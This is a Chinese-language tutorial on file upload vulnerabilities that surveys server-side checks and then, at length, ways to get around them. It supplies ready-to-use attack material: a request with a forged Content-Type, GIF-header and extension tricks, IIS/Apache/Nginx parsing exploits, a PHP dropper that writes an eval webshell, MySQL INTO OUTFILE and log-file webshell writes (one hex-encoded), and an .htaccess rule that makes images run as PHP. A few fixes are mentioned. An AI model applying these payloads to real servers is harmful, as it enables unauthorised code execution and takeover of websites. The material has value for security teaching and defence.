mysql文件上传漏洞_文件上传漏洞
文件上传漏洞是web安全中经常利用到的一种漏洞形式。一些web应用程序中允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中,再通过url去访问以执行代码。
0x01文件上传校验姿势
(1)客户端javascript校验(一般只校验后缀名)
(2)服务端校验
文件头content-type字段校验(image/gif)
文件内容头校验(GIF89a)
后缀名黑名单校验
后缀名白名单校验
自定义正则校验
(3)WAF设备校验(根据不同的WAF产品而定
客户端校验
一般都是在网页上写一段javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式。
判断方式:在浏览加载文件,但还未点击上传按钮时便弹出对话框,内容如:只允许上传.jpg/.jpeg/.png后缀名的文件,而此时并没有发送数据包。
服务端校验
content-type字段校验
这里以PHP代码为例,模拟web服务器端的校验代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
if($_FILES['userfile']['type'] != "image/gif")
#这里对上传的文件类型进行判断,如果不是image/gif类型便返回错误。
{
echo "Sorry, we only allow uploading GIF images";
exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile))
{
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?>
可以看到代码对上传文件的文件类型进行了判断,如果不是图片类型,返回错误。
文件头校验
可以通过自己写正则匹配,判断文件头内容是否符合要求,这里举几个常见的文件头对应关系:
(1) .JPEG;.JPE;.JPG,”JPGGraphic File”
(2) .gif,”GIF 89A”
(3) .zip,”Zip Compressed”
(4) .doc;.xls;.xlt;.ppt;.apr,”MS Compound Document v1 or Lotus Approach APRfile”
0x02文件上传绕过校验姿势
(1)客户端绕过(抓包改包)
(2)服务端绕过
文件类型
文件头
文件后缀名
(3)配合文件包含漏洞绕过
(4)配合服务器解析漏洞绕过
(4)CMS、编辑器漏洞绕过
(5)配合操作系统文件命名规则绕过
(6)配合其他规则绕过
(7)WAF绕过
客户端绕过
可以利用burp抓包改包,先上传一个gif类型的木马,然后通过burp将其改为asp/php/jsp后缀名即可。
服务端绕过
文件类型绕过
我们可以通过抓包,将content-type字段改为image/gif
1
2
3
4
5
6
7
8
9
10
POST /upload.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: libwww-perl/5.803
Content-Type: multipart/form-data; boundary=xYzZY
Content-Length: 155
--xYzZY
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: image/gif (原为 Content-Type: text/plain)
文件头绕过
在木马内容基础上再加了一些文件信息,有点像下面的结构
1
GIF89a<?php phpinfo(); ?>
文件后缀名绕过
前提:黑名单校验
黑名单检测:一般有个专门的 blacklist 文件,里面会包含常见的危险脚本文件。
绕过方法:
(1)找黑名单扩展名的漏网之鱼 - 比如 asa 和 cer 之类
(2)可能存在大小写绕过漏洞 - 比如 aSp 和 pHp 之类
能被解析的文件扩展名列表:
jsp jspx jspf
asp asa cer aspx
php php php3 php4
exe exee
配合文件包含漏洞
前提:校验规则只校验当文件后缀名为asp/php/jsp的文件内容是否为木马。
绕过方式:(这里拿php为例,此漏洞主要存在于PHP中)
(1)先上传一个内容为木马的txt后缀文件,因为后缀名的关系没有检验内容;
(2)然后再上传一个.php的文件,内容为
此时,这个php文件就会去引用txt文件的内容,从而绕过校验,下面列举包含的语法:
1
2
3
4
5
6
7
8
#PHP
#ASP
#JSP
or
配合服务器解析漏洞
IIS5.X-6.X解析漏洞
使用iis5.x-6.x版本的服务器,大多为windows server 2003,网站比较古老,开发语句一般为asp;该解析漏洞也只能解析asp文件,而不能解析aspx文件。
目录解析(6.0)
形式:http://www.xxx.com/xx.asp/xx.jpg
原理: 服务器默认会把.asp,.asa目录下的文件都解析成asp文件。
文件解析
形式:http://www.xxx.com/xx.asp;.jpg
原理:服务器默认不解析;号后面的内容,因此xx.asp;.jpg便被解析成asp文件了。
解析文件类型
IIS6.0 默认的可执行文件除了asp还包含这三种 :
/test.asa
/test.cer
/test.cdx
修复方案
1.目前尚无微软官方的补丁,可以通过自己编写正则,阻止上传xx.asp;.jpg类型的文件名。
2.做好权限设置,限制用户创建文件夹。
APACHE解析漏洞
漏洞原理
Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如 test.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php。
漏洞形式
http://www.xxxx.xxx.com/test.php.php123
其余配置问题导致漏洞
(1)如果在 Apache 的 conf 里有这样一行配置 AddHandler php5-script .php 这时只要文件名里包含.php 即使文件名是 test2.php.jpg 也会以 php 来执行。
(2)如果在 Apache 的 conf 里有这样一行配置 AddType application/x-httpd-php .jpg 即使扩展名是 jpg,一样能以 php 方式执行。
(3)Apache解析漏洞(CVE-2017-15715)绕过上传黑名单
我们利用CVE-2017-15715,上传一个包含换行符的文件。注意,只能是\x0A,不能是\x0D\x0A,所以我们用hex功能在1.php后面添加一个\x0A:
然后访问/1.php%0A,即可发现已经成功getshell:
修复方案
(1)apache配置文件,禁止.php.这样的文件执行,配置文件里面加入
1
2
3
4
Order Allow,Deny
Deny from all
(2)用伪静态能解决这个问题,重写类似.php.*这类文件,打开apache的httpd.conf找到LoadModule rewrite_module modules/mod_rewrite.so
把#号去掉,重启apache,在网站根目录下建立.htaccess文件,代码如下:
1
2
3
4
5
6
7
8
9
10
11
RewriteEngine On
RewriteRule .(php.|php3.) /index.php
RewriteRule .(pHp.|pHp3.) /index.php
RewriteRule .(phP.|phP3.) /index.php
RewriteRule .(Php.|Php3.) /index.php
RewriteRule .(PHp.|PHp3.) /index.php
RewriteRule .(PhP.|PhP3.) /index.php
RewriteRule .(pHP.|pHP3.) /index.php
RewriteRule .(PHP.|PHP3.) /index.php
NGINX<8.03解析漏洞
另外一种手法
上传一个名字为test.jpg,以下内容的文件。
1
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
然后访问test.jpg/.php,在这个目录下就会生成一句话木马shell.php。
修复方案
(1)修改php.ini文件,将cgi.fix_pathinfo的值设置为0;
(2)在Nginx配置文件中添加以下代码:
1
2
3
if ( $fastcgi_script_name ~ ..*/.*php ) {
return 403;
}
这行代码的意思是当匹配到类似test.jpg/a.php的URL时,将返回403错误代码。
IIS7.5解析漏洞
IIS7.5的漏洞与nginx的类似,都是由于php配置文件中,开启了cgi.fix_pathinfo,而这并不是nginx或者iis7.5本身的漏洞。
配合操作系统文件命令规则
上传不符合WINDOWS文件命名规则的文件名
test.asp.
test.asp(空格)
test.php:1.jpg之后传输数据流test.<<
test.php::$DATA
shell.php::$DATA…….
会被windows系统自动去掉不符合规则符号后面的内容。
LINUX下后缀名大小写
在linux下,如果上传php不被解析,可以试试上传pHp后缀的文件名。
CMS、编辑器漏洞
(1)CMS漏洞:比如说JCMS等存在的漏洞,可以针对不同CMS存在的上传漏洞进行绕过。
(2)编辑器漏洞:比如FCK,ewebeditor等,可以针对编辑器的漏洞进行绕过。
后台管理数据备份拿Shell
第一步:上传一句话,记录文件地址
第二步:备份数据库,将地址换成木马上传的地址,备份
第三步:重命名,将图片格式的换成php,asp,jsp格式的
第四步:如果备份数据库路径不能改的话
解决办法:(1)抓包工具修改地址
(2)在前端HTML里面改
第五步:在设置页面插入,注意语句的闭合
phpmyadmin
第一步:获取网站的绝对路径
报错显示路径
phpinfo()显示
第二步:找记录日志的文件,开启记录日志
第三步:修改日志存放的路径(网站的绝对路径)
第四步:将php一句话木马写入日志
1
select "<?php eval($_POST['pass']);?>"
SQL语句创建表写入一句话
第一步:创建表,表里建一个列
1
creat table `mysql`.`biao`(`biao2` text not null);
第二步:将一句话插入到表中
1
insert into `mysql`.`biao`(`biao2`)values('<?php @eval($_POST['pass']);?>')
第四步:将表导出,知道网站的绝对路径
1
select biao2 from biao into outfile '网站绝对路径';
SQL语句写入一句话
写入文件一句话(网站绝对路径)
1
select '<?php @eval($_POST[x]);?>' into outfile '网站绝对路径\1.php';
有时用16进制写入
1
select 0x3c3f70687020406576616c28245f504f53545b2770617373275d293b3f3e,2 into outfile '网站绝对路径\1.php'
读取文件
1
select load_file('文件地址')
配合其他规则
(1)0x00截断(php 版本<5.3.4):基于一个组合逻辑漏洞造成的,通常存在于构造上传文件路径的时候
test.php(0x00).jpg
test.php%00.jpg
(2)JPG文件解析
上传一个.htaccess文件:这样整个文件夹里的jpg文件全部解析为php文件
1
2
3
4
5
6
7
8
AddType applocation/x-httpd-php .jpg
Options +FollowSymlinks -Multiviews
RewriteEngine on
RewriteCond %{REQQUEST_FILENAME} !-d
RewriteCond %{REQQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php/$1 [QSA,PT,L]
mysql文件上传漏洞_文件上传漏洞相关推荐
- php post 漏洞_文件包含上传漏洞目录遍历命令执行漏洞
制丨阿星 来源丨freebuff 作者丨Deutsh 文件上传漏洞: 一句话木马 一句话木马主要由两部分组成:执行函数与 接收被执行代码的变量 执行函数: eval() assert() create ...
- nginx 上传文件漏洞_文件上传及解析漏洞
注:本文仅供学习参考 文件上传定义: 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行.这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等. 这种攻击方式是最为直接和有效的, ...
- java 文件上传漏洞_文件上传漏洞(绕过姿势)
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接.但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识.俗话说,知己知彼方能百战不殆,因此 ...
- nginx 上传文件漏洞_文件上传漏洞小结
1 概念 上传文件时,服务器端脚本语言,未对上传的文件进行严格的验证和过滤,就有可能上传恶意的脚本文件,从而控制整个网站,甚至是服务器. 2 危害 • 网站被控制,对文件增删改查,执行命令,链接数据库 ...
- nginx 上传文件漏洞_文件上传漏洞,解析漏洞总结
文件上传漏洞.解析漏洞总结 1.文件上传漏洞是什么 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力.常见场景是web服务器允许用户上传图片或者普通文本文件 ...
- java 文件上传漏洞_文件上传漏洞(File Upload)
简介 File Upload,即文件上传漏洞,通常是由于对用户上传文件的类型.内容没有进行严格的过滤.检查,使得攻击者可以通过上传木马,病毒,恶意脚本等获取服务器的webshell权限,并进而攻击控制 ...
- 上传文件显示进度条_文件上传带进度条进阶-断点续传
说明 1. 把文件按大小1M分割成N份 2. 每次上传时,告诉后台大文件的md5.当前第几份(从0开始).总共几份 3. 并行上传,前端同时开启5个请求进行传输增加速度 4. 上传失败或出错后,继续上 ...
- bootstrapinput传参数_***文件上传控件bootstrap-fileinput的使用和参数配置说明
特别注意: 引入所需文件后页面刷新查看样式奇怪,浏览器提示错误等,可能是因为js.css文件的引用顺序问题,zh.js需要在fileinput.js后面引入.bootstrap最好在fileinput ...
- vue获取上传进度_文件上传与读取实时进度展示-demo(Vue)
监听进程的方法onprogress 1 )文件读取的progress事件属于FileReader对象. 2 )下载的progress事件属于XMLHttpRequest对象. 3 )上传的progre ...
- php 蓝奏网盘上传文件,蓝奏云_文件上传_API
~~~[api] post:https://api-lanzou.anyhulian.ml/v2/upload.php *content-type=multipart/form-data; bound ...
最新文章
- 开发者在行动!中国防疫开源项目登上GitHub TOP榜
- log_sum_exp
- replication crash safe
- MySQL数据库优化实战
- Django框架深入了解_03(DRF之认证组件、权限组件、频率组件、token)
- c语言中的switch语句中的break和continue的作用
- python frombuffer_numpy.getbuffer和numpy.frombu
- python属性管理(1):基础
- 谁是杨强?首位AAAI华人主席,身兼5大顶级组织Fellow,也是华为诺亚方舟实验室开创者...
- += 对于可变对象和不可变对象的区别
- web访问linux创建目录权限设置,centos7下新建一个用户并限制访问目录
- JavaScript的那些书
- 关于CSDN登录提示手机号验证的问题
- [3]、Swagger——解决前后端打架问题
- acm中c语言标准输入输出,ACM竞赛之输入输出
- 用旧手机搭建服务器保姆级教程,不需要root也能成功
- 「鹿班智能设计平台」是如何工作的
- 刘强东都想明白了,你们却还在讨论流量焦虑
- 正则表达式 企业统一社会信用代码、企业13位工商注册号、企业组织机构代码...
- excel锁定单元格不能修改_EXCEL/WPS如何保护特定的数据不被更改?